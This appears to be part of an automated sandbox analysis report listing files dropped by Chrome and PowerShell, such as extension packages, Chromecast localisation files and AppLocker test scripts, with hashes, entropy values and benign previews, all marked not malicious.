                                                                                                                                                                SSDEEP:3:rR6TAulhFphifFwAjTho2Hgz4LAnhtWhFgS18LAn:F6VlMmAjFm8LMggS18LAn
                                                                                                                                                                MD5:441350F2F2F1F5726A84E989F3F9BF91
                                                                                                                                                                SHA1:C9530224671F181AE8ED47DBA82741B8AD920EA9
                                                                                                                                                                SHA-256:3640148F4EADB7D60185671799C27A8C530295076AF9179705EAA6D4C544D627
                                                                                                                                                                SHA-512:5AC785E7F3A35035B4958B2EF33534AB6E0448CDC5A5A881911123545930DAAFF6759AB2AB663327525A496E306CC1C98FD5F0EE079E2C6D92C47FD0CFAB51DE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {. "manifest_version": 2,. "name": "Federated Learning of Cohorts",. "floc_component_format": 3,. "version": "1.0.6".}
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\671955c8-acf7-487f-a135-625440086cfb.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):826470
                                                                                                                                                                Entropy (8bit):7.993386298864445
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:24576:J02eNcg9VZPrwM5S8l4AjrRWYyakv4vE5io5AURoFxpE4:J02czVZsM5FlltWYBkvRiouUeF7E4
                                                                                                                                                                MD5:BB2058E728F79C67137BDFCFCEEC72D4
                                                                                                                                                                SHA1:0AE586E5DD08EA7BECD5618DA868E7FA94910F60
                                                                                                                                                                SHA-256:9107E42F7F892FECD9A0A8CB05FEDAE7D9E045442FB17AF11A77F6F7253B66B7
                                                                                                                                                                SHA-512:E35C7CC13C58748D3A3970BD5DA5D2568220EA939CB16FDB6E68078C198AFF78FDF06BC4EFAF564186FBA82E4E427CDA9EB08CCCC2984E66D725D7388D40244B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\73b09082-e0a5-403d-bc04-ab6ac06c3537.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3110
                                                                                                                                                                Entropy (8bit):7.933903341619943
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:0MWjN1CDThRYxENcEvyGF/8WAr6Fv9MFghzqSl:0MWjN1gRYavR8WjMFQzqSl
                                                                                                                                                                MD5:A83A2746B84F1CF573B02965B72ED592
                                                                                                                                                                SHA1:85CC572D6F90029EB99AAFA56297D1BCA494313A
                                                                                                                                                                SHA-256:DF4B53C1C7C48E80753D4945E6EC7847084F51BF57F0ED9D341326C74651D6EC
                                                                                                                                                                SHA-512:C287F479EF572A06FF191C4E9A8A718507C97A2A45CB265D7DC65DD7922B80D36CE7660EC5D7EA9F3D1F1EF71C51C3E4F3D7973754F97A89B4F14D1B1FDE70DE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\7f4122a7-f299-4e97-ac86-0a64ab2e897c.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):248531
                                                                                                                                                                Entropy (8bit):7.963657412635355
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
                                                                                                                                                                MD5:541F52E24FE1EF9F8E12377A6CCAE0C0
                                                                                                                                                                SHA1:189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
                                                                                                                                                                SHA-256:81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
                                                                                                                                                                SHA-512:D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\8575e93c-1f7c-493f-ae96-1cbd07ff8d92.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2hy1fia.0bf.psm1
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcu5dvth.0ph.ps1
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\b946a3cc-4100-404d-8dec-7a7f7ba9c1b0.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\c8024ca9-9417-4840-8bb1-1ac39bfaeb29.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):82480
                                                                                                                                                                Entropy (8bit):7.997257675624181
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:1536:tXOAnotuIHFnQ7yx41gld6L8xo/YovdHZEt6jPi6qMuonT7Xd8u+Kp4d1Uc8q:ttou6uKETLNAovRZEt6jKVMd9BO/z
                                                                                                                                                                MD5:40D74C91FBCB0ACF1DC30524A9D24C06
                                                                                                                                                                SHA1:CF0D403A8B8FEDB851A7A23E021FFE8C86FBFF90
                                                                                                                                                                SHA-256:C2C145ECAFDE13BFBEE93228551D35F7B04A87974CDA5303C5E47D6955AC3976
                                                                                                                                                                SHA-512:3609C7762FC4227CEDB482D191D65FB7C3BAE357F7D66E81B0ABE8B582DBCC5456A0FFC911C017251A1FA3293D1D36196506BFA448E93E16A8CC847D6BC9682A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\e5fb32b8-1da2-494b-8034-fc1022272e92.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):28748
                                                                                                                                                                Entropy (8bit):7.9918576871001425
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:384:SU7ZPeF1W3JgUrqaO/8dOcbwy59NjS5BMYGYycIfPhrVx2NtsEeSeFzVXe/rxd:H7peFkZL9RZSz3gnhhGcpXetd
                                                                                                                                                                MD5:2A37AD0EC191D53104BB46953AC6C43C
                                                                                                                                                                SHA1:FD23FFC5B7E4A6B45FBD88A486D15FAA51DC07AE
                                                                                                                                                                SHA-256:51F075EB69486CB23B32A0776782B4A1B2AF204429AB94510469E02B115E56CC
                                                                                                                                                                SHA-512:AEB91CB7902A800D7B0C43627EC2B52121BC41BA29A1B6ABEDBFCFA4802254A0594ED239EA7A3F8D40241E43D436428D1E4AC117BD97269D78460F82F9BDCF68
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\f64029a0-8ca6-441c-8a7b-7b97fed1edb1.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):5168
                                                                                                                                                                Entropy (8bit):7.956694278195136
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:HLCk5oNLp/f4PvzusAnSWuaGqLiWuGVaNhZMHd0NJHp9873PDqQ7:H2vUv7AnSKnaNPM+4uA
                                                                                                                                                                MD5:3E5CCD9B583763AF68E28C5101373167
                                                                                                                                                                SHA1:2005CDC0A8070B65E321A197D576698ECC267496
                                                                                                                                                                SHA-256:41412C0863920BA95E9FDBD3AF000CBE926A73C078997A233DF55379A5C4D274
                                                                                                                                                                SHA-512:04BF4F7320326B085C40527797577D8770A30A1ED24A8587A000A5AE1D8F39E0B7F187DB14603295AC7A2901A4698683CC3BED2C2611539293A1927AB31BEAE1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\671955c8-acf7-487f-a135-625440086cfb.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):826470
                                                                                                                                                                Entropy (8bit):7.993386298864445
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:24576:J02eNcg9VZPrwM5S8l4AjrRWYyakv4vE5io5AURoFxpE4:J02czVZsM5FlltWYBkvRiouUeF7E4
                                                                                                                                                                MD5:BB2058E728F79C67137BDFCFCEEC72D4
                                                                                                                                                                SHA1:0AE586E5DD08EA7BECD5618DA868E7FA94910F60
                                                                                                                                                                SHA-256:9107E42F7F892FECD9A0A8CB05FEDAE7D9E045442FB17AF11A77F6F7253B66B7
                                                                                                                                                                SHA-512:E35C7CC13C58748D3A3970BD5DA5D2568220EA939CB16FDB6E68078C198AFF78FDF06BC4EFAF564186FBA82E4E427CDA9EB08CCCC2984E66D725D7388D40244B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\am\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):17307
                                                                                                                                                                Entropy (8bit):5.461848619761356
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:arfbEVrFvMP4rMhuDopC3vUuFBYZV6uml:aHEVrFvMP4KuFvr6D6uml
                                                                                                                                                                MD5:26330929DF0ED4E86F06C00C03F07CE3
                                                                                                                                                                SHA1:478F3B7E7A7E007BEE182B89C2EF6FFE6045E92C
                                                                                                                                                                SHA-256:621B5139ED199022BB6529AF18ED4DC312AE9F3E90ECAF3B2C9E1D12114F5B22
                                                                                                                                                                SHA-512:0BE6183A1BF12575C0F99960705D4249E79CDB8528C55FF132BE99A111F09494231AD6A36CD61B090A3B34C6971D68A29373BA346888E852C52E05DC14380682
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": "...... ... ..... .. ...... .... ... .... ......?".. },.. "128276876460319075": {.. "message": "..... ...".. },.. "1428448869078126731": {.. "message": ".... ......".. },.. "1522140683318860351": {.. "message": "..... ....... .... ..... .....".. },.. "1550904064710828958": {.. "message": "....".. },.. "1636686747687494376": {.. "message": "... ...".. },.. "1802762746589457177": {.. "message": "...".. },.. "1850397500312020388": {.. "message": ".$START_LINK$Google Home .......$END_LINK$ ... ...... Chromecast ..... .....? $START_SPAN$*$END_SPAN$",.. "placeholde
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ar\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16809
                                                                                                                                                                Entropy (8bit):5.458298990148825
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:0IprKC78JmUjk8RkeryFOYPATxLZ8fsbEYIFV6c8TEKdl:Jrp8JjA8RkerK0lcTFV6uml
                                                                                                                                                                MD5:39CB048A1AE1097F992F57DF500F07F9
                                                                                                                                                                SHA1:C15EC37DA4DE26F36A2D71CB258CDC2C8601DB35
                                                                                                                                                                SHA-256:41E4D45AF5B70DD25C7C368BFB8B947C7DA8738DD76BD6D60E5B59328F4828EB
                                                                                                                                                                SHA-512:096EBEDF7FE9F2C8D1E50008990624A26C9A9A5CF35A8BE7596CF439C75B842ADAD5115C541ECC814298E4D6F7E5153591EEA800899B57852C7494CE757BCFBB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": ".. .. ........ ....... .... .... ... .......".. },.. "128276876460319075": {.. "message": "...... .......".. },.. "1428448869078126731": {.. "message": "..... .......".. },.. "1522140683318860351": {.. "message": "..... ........ .... ........ ... .....".. },.. "1550904064710828958": {.. "message": "...".. },.. "1636686747687494376": {.. "message": "......".. },.. "1802762746589457177": {.. "message": "..... .....".. },.. "1850397500312020388": {.. "message": "... ....... .. .... Chromecast .. $START_LINK$..... Google Home$END_LINK$. $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\bg\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):18086
                                                                                                                                                                Entropy (8bit):5.408731329060678
                                                                                                                                                                Encrypted:false
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\bn\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):19695
                                                                                                                                                                Entropy (8bit):5.315564774032776
                                                                                                                                                                Encrypted:false
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ca\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15504
                                                                                                                                                                Entropy (8bit):5.242147131052711
                                                                                                                                                                Encrypted:false
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\cs\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15552
                                                                                                                                                                Entropy (8bit):5.406413558584244
                                                                                                                                                                Encrypted:false
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\da\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15340
                                                                                                                                                                Entropy (8bit):5.2479291792849105
                                                                                                                                                                Encrypted:false
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\de\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15555
                                                                                                                                                                Entropy (8bit):5.258022363187752
                                                                                                                                                                Encrypted:false
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\el\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):17941
                                                                                                                                                                Entropy (8bit):5.465343004010711
                                                                                                                                                                Encrypted:false
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\en\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):14897
                                                                                                                                                                Entropy (8bit):5.197356586852831
                                                                                                                                                                Encrypted:false
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\es\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15560
                                                                                                                                                                Entropy (8bit):5.236752363299121
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:NAgprfy1pTCukFr+1DIyDRoanvV6c8TEKdl:KMrq6FrmvV6uml
                                                                                                                                                                MD5:8A70C18BB1090AA4D500DE9E8E4A00EF
                                                                                                                                                                SHA1:8AFC097FA956C1317DB0835348B2DA19F0789669
                                                                                                                                                                SHA-256:FF173D1CEF665B1234E02F11070ABD2B65230318150734579A03C7F31B4AE3F4
                                                                                                                                                                SHA-512:140BAF40A4ABE9B8AF0855B0EBB7DFDF17869EDFC4EE1037C5EA7FDD8EDEBD4850E055B6A4D7B8782657618BCE1517813779BA01BA993CC838BB43E0BE71EEEE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Congelaci.n de im.genes".. },.. "1213957982723875920": {.. "message": ".Cu.l de las siguientes respuestas describe mejor tu red?".. },.. "128276876460319075": {.. "message": "Detecci.n de dispositivo".. },.. "1428448869078126731": {.. "message": "Fluidez del v.deo".. },.. "1522140683318860351": {.. "message": "Error en la conexi.n. Vuelve a intentarlo.".. },.. "1550904064710828958": {.. "message": "V.deo fluido".. },.. "1636686747687494376": {.. "message": "Perfecta".. },.. "1802762746589457177": {.. "message": "Volumen".. },.. "1850397500312020388": {.. "message": ".Puedes ver tu Chromecast en la $START_LINK$aplicaci.n Google.Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\et\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15139
                                                                                                                                                                Entropy (8bit):5.228213017029721
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:Z48bxhWYp5Ny5M63niwAKD4rrJSJ2RkPXh9P5NFP2+NBMU01jewUEVez3QOiSevy:ikxprot3lYkf/rHBc0KsUV6c8TEKdl
                                                                                                                                                                MD5:A62F12BCBA6D2C579212CA2FF90F8266
                                                                                                                                                                SHA1:F7E964A2D9BBDA364252BCE5CFBA3FD34FDD825E
                                                                                                                                                                SHA-256:3EB3EB0B3B4A8E5A477D1B3C3A3891CCC7DC6B8879ECE243A7BD7C478068273D
                                                                                                                                                                SHA-512:E300201245C00ADEC8F39D586875F8FA4607AB203572BF3CE353C1CA7CDCA05B8786810CA0CEE27E4EA54A5EFD53690F1EA7AA4148CFF472A66BB11202723566
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Hangub".. },.. "1213957982723875920": {.. "message": "Milline j.rgmistest v.idetest kirjeldab k.ige paremini teie v.rku?".. },.. "128276876460319075": {.. "message": "Seadme tuvastamine".. },.. "1428448869078126731": {.. "message": "Video sujuvus".. },.. "1522140683318860351": {.. "message": ".hendamine eba.nnestus. Proovige uuesti.".. },.. "1550904064710828958": {.. "message": ".htlane".. },.. "1636686747687494376": {.. "message": "T.iuslik".. },.. "1802762746589457177": {.. "message": "Helitugevus".. },.. "1850397500312020388": {.. "message": "Kas n.ete oma Chromecasti $START_LINK$rakenduses Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\fa\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):17007
                                                                                                                                                                Entropy (8bit):5.486206928823098
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:rngaIprIX/t9wkjTJrs3hqaXxRQdiIMDnD+LhfHdo5tV6c8TEKdl:4rin5rU1X7Qd0M90tV6uml
                                                                                                                                                                MD5:F7B16CCC7B0670E26AF62C5F3220D416
                                                                                                                                                                SHA1:0CF2D31BEF1900E73FA9529E51F1AC1DB2B81EDE
                                                                                                                                                                SHA-256:84560CB7F847A00515B676B62F2B82C3D56CEA0CB397D457474263588683FEEF
                                                                                                                                                                SHA-512:8631A3B4A36D5A3D9354A71A5CB34BD1B9FA4062D497D3F1EB118365E314B5CA15F0EDAD6393FCA0C216F6E4806FF34905AEE0EF678CBCDAFB183AF376E94109
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".... ... .......".. },.. "1213957982723875920": {.. "message": ".... .. .. ..... ... .... ... .. .. ...... ... ..... .......".. },.. "128276876460319075": {.. "message": "..... ......".. },.. "1428448869078126731": {.. "message": "..... .....".. },.. "1522140683318860351": {.. "message": "..... ...... .... ..... ...... ...... .....".. },.. "1550904064710828958": {.. "message": "....".. },.. "1636686747687494376": {.. "message": "....".. },.. "1802762746589457177": {.. "message": "..... ...".. },.. "1850397500312020388": {.. "message": ".... ......... Chromecast ... .. .. $START_LINK$ ...... Google Home$END_LINK$ ....... $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\fi\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15265
                                                                                                                                                                Entropy (8bit):5.268294112434671
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:efMprYxiYUNpj5Coik1tXxrUhvUzSPWV6c8TEKdl:eIrfbjosdrU5WV6uml
                                                                                                                                                                MD5:7389880D1E20BEB694BA9A548A2E8D3A
                                                                                                                                                                SHA1:55FC039EFFF508CC2231EE66104EC94489E74D92
                                                                                                                                                                SHA-256:15B086E3E7DF0FB8B497BC2C0D704181817A87CF9087B4AC13777CE2D4CE79D3
                                                                                                                                                                SHA-512:24D15CE4DC1E74BF0E7A54FF1626857D9E42CAE4260B78A27DD1544EA0376E9C17A4065BACE7438992A544442A866387B0CF2F6FE542D09CE9A0099ABA4D8E47
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Pys.htyy".. },.. "1213957982723875920": {.. "message": "Mik. seuraavista kuvaa parhaiten verkkoasi?".. },.. "128276876460319075": {.. "message": "Laitteiden tunnistaminen".. },.. "1428448869078126731": {.. "message": "Videon tasaisuus".. },.. "1522140683318860351": {.. "message": "Yhteys ep.onnistui. Yrit. uudelleen.".. },.. "1550904064710828958": {.. "message": "Tasainen".. },.. "1636686747687494376": {.. "message": "T.ydellinen".. },.. "1802762746589457177": {.. "message": "..nenvoimakkuus".. },.. "1850397500312020388": {.. "message": "N.etk. Chromecastisi $START_LINK$Google Home .sovelluksessa$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\fil\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15570
                                                                                                                                                                Entropy (8bit):5.1924418176212646
                                                                                                                                                                Encrypted:false
